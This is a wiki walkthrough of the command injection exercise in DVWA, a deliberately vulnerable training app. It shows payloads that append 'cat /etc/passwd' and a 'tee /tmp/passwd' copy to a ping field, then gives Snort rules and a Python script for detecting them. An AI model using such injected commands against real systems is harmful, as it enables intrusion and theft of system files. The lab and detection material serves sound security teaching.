Difference between revisions of "DVWA: Command Injection"

Latest revision as of 04:46, 1 April 2017

  • Log in to DVWA
  • Click Command Injection
  • In the ping field, enter an IP address that can be pinged, for example your router, e.g.
192.168.0.223
  • The result looks roughly like this
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data.
64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms
64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms
64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms
64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms

--- 192.168.0.223 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms


  • Append a cat command after the IP address, for example
192.168.0.223; cat /etc/passwd


PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data.
64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms
64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms
64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms
64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms

--- 192.168.0.223 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
..
..
etc.
  • Look at the DVWA source to see why it behaves this way
cat /var/www/html/DVWA-1.9/vulnerabilities/exec/source/low.php


  • For fun, try copying the password file to tmp by injecting a command
192.168.1.106; cat /etc/passwd | tee /tmp/passwd


Snort Rule

To detect this activity, you can add some of the following alternative rules to Snort's local.rules

alert tcp any any -> 192.168.0.100 80 (msg:"passwd"; content:"passwd"; nocase; classtype:web-application-attack; sid:1000020;)
alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000024;)
alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;)
alert tcp any any -> 192.168.0.100 80 (msg:"cat /etc/passwd"; content:"cat+%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000022;)
alert tcp any any -> 192.168.0.100 80 (msg:"tee /tmp"; content:"tee+%2Ftmp"; nocase; classtype:web-application-attack; sid:1000023;)

When choosing rules, it is best to pick the most specific one rather than a general one.
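
The following added example (not part of the original page) emulates how the content and nocase options of the rules above match the raw request bytes, and shows why the general "passwd" rule also fires on harmless traffic while the specific ones do not. The request samples are constructed; the form field names ip and Submit and the /help/passwd-policy.html path are assumptions.

```python
from urllib.parse import urlencode

# msg -> content pattern, copied from the Snort rules above.
RULES = {
    "passwd": "passwd",
    "/passwd": "%2Fpasswd",
    "/etc/passwd": "%2Fetc%2Fpasswd",
    "cat /etc/passwd": "cat+%2Fetc%2Fpasswd",
    "tee /tmp": "tee+%2Ftmp",
}


def fired(payload):
    """Return the msg of every rule whose content occurs in the payload.

    Snort's content option is a byte substring search and nocase makes it
    case-insensitive, so a lowercase comparison models both options.
    """
    low = payload.lower()
    return [msg for msg, content in RULES.items() if content.lower() in low]


# Constructed samples. urlencode() produces the same form encoding a browser
# sends for a POSTed form: space -> '+', '/' -> %2F, ';' -> %3B, '|' -> %7C.
# The field names "ip" and "Submit" are assumptions about the DVWA form.
INJECTED = urlencode({
    "ip": "192.168.1.106; cat /etc/passwd | tee /tmp/passwd",
    "Submit": "Submit",
})
BENIGN_PING = urlencode({"ip": "192.168.0.223", "Submit": "Submit"})
# Hypothetical harmless page on the same web server whose path contains "passwd".
BENIGN_PAGE = "GET /help/passwd-policy.html HTTP/1.1"

if __name__ == "__main__":
    for name, sample in [("injected", INJECTED),
                         ("benign ping", BENIGN_PING),
                         ("benign page", BENIGN_PAGE)]:
        print(f"{name:12} {sample}")
        print(f"{'':12} alerts: {fired(sample) or 'none'}")
```

The patterns are written with %2F and + because the rules inspect the body as it travels on the wire, before the web server decodes it.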